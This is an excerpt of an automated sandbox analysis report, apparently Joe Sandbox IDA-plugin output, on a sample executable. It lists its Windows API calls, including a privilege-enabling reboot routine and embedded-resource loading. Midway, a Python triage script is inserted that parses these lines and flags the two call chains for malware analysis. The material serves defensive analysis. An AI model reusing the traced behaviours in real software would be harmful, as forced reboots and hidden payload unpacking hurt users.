                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                              • Instruction ID: d44512077142226ebef1615cfdb59f208ea4aebd3ed4d24446e2b73eb7949d4a
                                                                              • Opcode Fuzzy Hash: 3bd7282c13d8f152a8301508d2aa72b6e2817799d08f3caede8a9fdcd0036c45
                                                                              • Instruction Fuzzy Hash: A7E06D713442082ED2409AEC6C51F92779C9309354F008022B988DB342D5719D108BE8
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,00406A24,?,?,?,?,00000000,?,00406A39,00406D67,00000000,00406DAC,?,?,?), ref: 00406A07
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                              • Instruction ID: ccd219c895c276d3a4f2ed408fb3af00451e62210c6f1137e8185e88dac79a2a
                                                                              • Opcode Fuzzy Hash: 2f6b808c0a98facf9b4219f47e50352985dbcf5de86cc118cb6830f30f21a29b
                                                                              • Instruction Fuzzy Hash: A0E0ED30300304BBD301FBA6CC42E4ABBECDB8A708BA28476B400B2682D6786E108428
                                                                              APIs
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021303AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLastWrite
                                                                              • String ID:
                                                                              • API String ID: 442123175-0
                                                                              • Opcode ID: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                              • Instruction ID: d11fc940c1eb4d9ab9bd5ee1403c634941755763b259216c6d34bff68e3e8731
                                                                              • Opcode Fuzzy Hash: 8d2af3ab7a63a8387ab01b8eb17bee2761ee08039256abb6018552f25082062b
                                                                              • Instruction Fuzzy Hash: 6DE0ED766081106BD710A65AD880EAB67DCDFC5764F00407BF904DB291D574AC049676
                                                                              APIs
                                                                              • FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00409127,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 004072A3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FormatMessage
                                                                              • String ID:
                                                                              • API String ID: 1306739567-0
                                                                              • Opcode ID: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                              • Instruction ID: 7b38442d06f496379890204edef453c821f476d6c52b93f329ea0e63e965d40b
                                                                              • Opcode Fuzzy Hash: 2dc6ecac2658c0303fbeb732946dba8a31d4bcf901e7642ce2bff6997528785c
                                                                              • Instruction Fuzzy Hash: 17E0D8A0B8830136F22414544C87B77220E47C0700F10807E7700ED3C6D6BEA906815F
                                                                              APIs
                                                                              • SetEndOfFile.KERNEL32(?,02147CA0,0040A08C,00000000), ref: 004076B3
                                                                                • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,021303AC,?,00409CCE,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 0040748F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 734332943-0
                                                                              • Opcode ID: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                              • Instruction ID: f788b2e916ece263959a2b362e6cc5638f15ca068e5e6b6e193a7bb405067b9b
                                                                              • Opcode Fuzzy Hash: 3c9e02bda174eefd6a6752df40b73b0cbe28e66d981a9881f8e50d89b6fd2d40
                                                                              • Instruction Fuzzy Hash: BEC04CA1A1410047CB40A6BE89C1A1666D85A4821530485B6B908DB297D679E8004666
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                              • Instruction ID: c47f2f618e2971e07f5b1abb1c43dc6c143ad8b034d1ddbdae76011a93498253
                                                                              • Opcode Fuzzy Hash: 070e151ae7371931e812c23e1680e2574253ea8634671ff6451d3f815f7c1847
                                                                              • Instruction Fuzzy Hash: 54B09B76A1C2415DE705DAD5745153863D4D7C47143A14977F104D35C0D53DA4144519
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(?,00407019), ref: 0040700C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                              • Instruction ID: a55afa0689d716a84ca499c05243e055e04a08b2ab071a0afeb25d409e08decd
                                                                              • Opcode Fuzzy Hash: 258b7047379ce46b8540a294da6ad57472ce1849ceeb23a1b4b516eeda09cad2
                                                                              • Instruction Fuzzy Hash: FFA022A8C08000B2CE00E2E08080A3C23283A88308BC08BA2320CB20C0C03CE008020B
                                                                              APIs
                                                                              • CharPrevA.USER32(?,?,0040696C,?,00406649,?,?,00406D87,00000000,00406DAC,?,?,?,?,00000000,00000000), ref: 00406972
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrev
                                                                              • String ID:
                                                                              • API String ID: 122130370-0
                                                                              • Opcode ID: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                              • Instruction ID: 57bb655d476c0b104ac503b4dc16dcc9cc7d9309af7e6782790f501f1b0aeff9
                                                                              • Opcode Fuzzy Hash: 4f55c7aa95ee0cc6def6f8b84b07f7a00b4eea213dcaa2411b48aa5a82a0c27b
                                                                              • Instruction Fuzzy Hash:
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 00407FA0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                              • Instruction ID: 20a67eb23ea55951ef5110b519d4bcc97d420124264edb02c1094051c82f9398
                                                                              • Opcode Fuzzy Hash: f3d8bc7867bd0b1d1bf8a1a21c6b81e8059d467c94b9dab864cb1ccd8d8ada4e
                                                                              • Instruction Fuzzy Hash: D2117571A042059BDB00EF19C881B5B7794AF44359F05807EF958AB3C6DB38EC00CBAA
                                                                              APIs
                                                                              • VirtualFree.KERNEL32(?,?,00004000,?,0000000C,?,-00000008,00003FFB,004018BF), ref: 004016B2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 1263568516-0
                                                                              • Opcode ID: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                              • Instruction ID: 63c8255cdd02620dd55efc6405714c3c0a63becca9b218cdeda95617091702f1
                                                                              • Opcode Fuzzy Hash: b4adf7af80dac51c1d798f2a6c61165d01e4b71ea77261fd7569ef2c91f553a4
                                                                              • Instruction Fuzzy Hash: 3601A7726442148BC310AF28DDC093A77D5EB85364F1A4A7ED985B73A1D23B6C0587A8
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID:
                                                                              • API String ID: 2962429428-0
                                                                              • Opcode ID: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                              • Instruction ID: e7ddd8f09f86228f97b62737e097d00c20d119481f2284b048c56b7aa048eabb
                                                                              • Opcode Fuzzy Hash: fc6098dcd6b1504a072b68d3feaaa537492281b052079d944a979dec092e75e7
                                                                              • Instruction Fuzzy Hash: 41D05E82B00A6017D615F2BE4D8869692D85F89685B08843AF654E77D1D67CEC00838D
                                                                              APIs
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000,?,00407E9D), ref: 00407ECF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 1263568516-0
                                                                              • Opcode ID: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                              • Instruction ID: 622015b425f940adf6dc1d0f89e873b9c6d17cfe6f0c2733970da1323f12c917
                                                                              • Opcode Fuzzy Hash: c7bedad96efb848ea9f674ed311898bb29a23f2a16fc3a9de009753beeeb9dd9
                                                                              • Instruction Fuzzy Hash: 3ED0E9B17553055BDB90EEB98CC1B0237D8BB48610F5044B66904EB296E674E8009654
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000028), ref: 00409457
                                                                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
                                                                              • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                              • String ID: SeShutdownPrivilege
                                                                              • API String ID: 107509674-3733053543
                                                                              • Opcode ID: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                              • Instruction ID: 55e16e97e4c30333ef6e9d7cb44a764448f3c494fd9ead6bbbdf5d5bb2f9c1eb
                                                                              • Opcode Fuzzy Hash: 5d5c4cc2167cea31fe6e778ad900630fb502c4628614430f67a63468396a48bc
                                                                              • Instruction Fuzzy Hash: 61F012B069830179E610AAB18D07F6762885BC4B18F50493ABB15FA1C3D7BDD809466F
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
                                                                              • SizeofResource.KERNEL32(00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000,0040A2FC), ref: 00409C09
                                                                              • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5,?,00000000), ref: 00409C1B
                                                                              • LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6,00000000,0040A27D,?,00000001,00000000,00000002,00000000,0040A2C5), ref: 00409C2C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                              • String ID:
                                                                              • API String ID: 3473537107-0
                                                                              • Opcode ID: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                              • Instruction ID: ed04ed1443b666af2c347742ca0221af59beed1f1180006ed42e296f861e82c7
                                                                              • Opcode Fuzzy Hash: ce7c2a79786de0a8682d58b31ceb4174bbddb2d24ae6ad16542ef9ae896a3e40
                                                                              • Instruction Fuzzy Hash: ECE07EA0B483562AFA6076FB08C2B2A018C4BA671DF40003BB701B92C3DEBD8C14856E
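The two call chains recorded above, the SeShutdownPrivilege / ExitWindowsEx reboot routine at 004094B3 and the FindResourceA / SizeofResource / LoadResource / LockResource unpacking routine at 00409BF6, are exactly the kind of sequence a triage script can pull out of a report in this format. The following Python is an added example and not Joe Sandbox or plugin code: it parses the plugin's `APIs` lines into records, decodes the ExitWindowsEx flag and resource-type arguments using the standard Win32 constant values, and flags both chains when they appear in order. The sample lines are copied from this report; the chain definitions, the function names and the constant tables are the example's own.

```python
"""Parse Joe Sandbox IDA-plugin 'APIs' lines and flag two known call chains.

Added example for this report, not Joe Sandbox code. SAMPLE_LINES is copied
from the report; the constant tables are standard Win32 values.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Union

# Lines copied from the report's ExitWindowsEx, resource and SetEndOfFile entries.
SAMPLE_LINES = """\
• GetCurrentProcess.KERNEL32(00000028), ref: 00409457
• OpenProcessToken.ADVAPI32(00000000,00000028), ref: 0040945D
• LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00409476
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 0040949D
• GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 004094A2
• ExitWindowsEx.USER32(00000002,00000000), ref: 004094B3
• FindResourceA.KERNEL32(00000000,00002B67,0000000A), ref: 00409BF6
• SizeofResource.KERNEL32(00000000,00000000,?,00409CE6), ref: 00409C09
• LoadResource.KERNEL32(00000000,00000000,00000000,00000000,?,00409CE6), ref: 00409C1B
• LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00409CE6), ref: 00409C2C
  • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A), ref: 0040748F
"""

# One bullet per call: optional "Part of subcall function XXXXXXXX: " prefix,
# then Api.MODULE(arg,arg,...), ref: XXXXXXXX
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# ExitWindowsEx uFlags bits (EWX_LOGOFF is 0, so it is the value when no bit is set).
EWX_FLAGS = {0x1: "EWX_SHUTDOWN", 0x2: "EWX_REBOOT", 0x4: "EWX_FORCE",
             0x8: "EWX_POWEROFF", 0x10: "EWX_FORCEIFHUNG"}
# Predefined resource types passed as the lpType integer of FindResourceA.
RESOURCE_TYPES = {2: "RT_BITMAP", 3: "RT_ICON", 6: "RT_STRING", 10: "RT_RCDATA", 24: "RT_MANIFEST"}

REBOOT_CHAIN = ["OpenProcessToken", "LookupPrivilegeValueA", "AdjustTokenPrivileges", "ExitWindowsEx"]
RESOURCE_CHAIN = ["FindResourceA", "SizeofResource", "LoadResource", "LockResource"]


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Union[int, str]]   # ints for hex words, str for '?' or literal strings
    ref: int                      # address of the call site
    subcall_of: Optional[int]     # function the plugin attributed a nested call to


def parse_arg(tok: str) -> Union[int, str]:
    """Hex words (possibly negative, as the plugin prints them) become unsigned ints."""
    tok = tok.strip()
    if re.fullmatch(r"-?[0-9A-Fa-f]{8}", tok):
        return int(tok, 16) & 0xFFFFFFFF
    return tok  # '?' (unresolved) or a literal such as SeShutdownPrivilege


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headers such as 'APIs' or 'Memory Dump Source'
        args = [parse_arg(a) for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls


def decode_exitwindows(call: ApiCall) -> List[str]:
    flags = call.args[0]
    return [n for bit, n in EWX_FLAGS.items() if flags & bit] or ["EWX_LOGOFF"]


def find_sequence(calls: List[ApiCall], wanted: List[str]) -> bool:
    """True if every API in `wanted` occurs in that order (gaps allowed)."""
    it = iter(calls)
    return all(any(c.api == w for c in it) for w in wanted)


def triage(text: str):
    calls = parse_api_lines(text)
    findings = []
    if find_sequence(calls, REBOOT_CHAIN):
        lp = next(c for c in calls if c.api == "LookupPrivilegeValueA")
        ex = next(c for c in calls if c.api == "ExitWindowsEx")
        findings.append(f"privilege {lp.args[1]} enabled, then "
                        f"ExitWindowsEx({'|'.join(decode_exitwindows(ex))}) at {ex.ref:08X}")
    if find_sequence(calls, RESOURCE_CHAIN):
        fr = next(c for c in calls if c.api == "FindResourceA")
        rtype = RESOURCE_TYPES.get(fr.args[2], fr.args[2])
        findings.append(f"embedded resource id {fr.args[1]:#x} of type {rtype} "
                        f"loaded at {fr.ref:08X}")
    return calls, findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LINES)[1]:
        print(f)
```

Running the block against the copied lines reports the enabled privilege with `ExitWindowsEx(EWX_REBOOT)` and the `RT_RCDATA` resource `0x2b67`, which is what the two entries above show in raw form; feeding it the full report lets the same chain definitions be checked across every function rather than one entry at a time.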
                                                                              APIs
                                                                              • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040544A,?,?,?,00000000,004055FC), ref: 0040525B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                              • Instruction ID: 297a7c39c0825e6b478cba46507f56ab37b47465b1590baa0f4eee863dd3b982
                                                                              • Opcode Fuzzy Hash: 8a1aa2f218564e89e29a3375e8324a6bde157643bf6b6cb70ff1562e164a822c
                                                                              • Instruction Fuzzy Hash: AED05EA630E6502AE21051AB2D85EBB4A9CCEC5BA4F18407FF648D7242D6248C069B76
                                                                              APIs
                                                                              • GetSystemTime.KERNEL32(?), ref: 004026CE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: SystemTime
                                                                              • String ID:
                                                                              • API String ID: 2656138-0
                                                                              • Opcode ID: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                              • Instruction ID: 69442b1fa125f02c17f5f00667ba5619268a94e84ed87230136e9e38920861ba
                                                                              • Opcode Fuzzy Hash: 1c1586f040ad907c453502297459692aa8199981632c93951a31d41848eff65d
                                                                              • Instruction Fuzzy Hash: 14E04F21E0010A82C704ABA5CD435EDF7AEAB95600B044272A418E92E0F631C251C748
                                                                              APIs
                                                                              • GetVersionExA.KERNEL32(?,004065E0,00000000,004065EE,?,?,?,?,?,00409C65), ref: 00405CF2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Version
                                                                              • String ID:
                                                                              • API String ID: 1889659487-0
                                                                              • Opcode ID: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                              • Instruction ID: 3c95a3e10eaf3ff9c271e05f7503c1a51fdcfb4de7972086e3eff1de8b037954
                                                                              • Opcode Fuzzy Hash: c84d22a34f8351a77119842959a44d1d4ba95f00f13a202a1719544d7380acd2
                                                                              • Instruction Fuzzy Hash: FDC012A040070186D7109B31EC02B1672D4AB44310F440539AEA4953C2E73C80018A5A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2938622978.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2938590960.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938647502.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2938666772.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                              • Instruction ID: 7dc6dc86846b3232beed044054ddb30c9891ac2fec336679fba6e94018ae2b4c
                                                                              • Opcode Fuzzy Hash: 7cb438cf7f0ff76753a1d16800e3023f3e313fbbfbb21f985cf38b771b24bb28
                                                                              • Instruction Fuzzy Hash: C032D775E00219DFCB14CF99CA80AADB7B2BF88314F24816AD855B7385DB34AE42CF55
                                                                              APIs
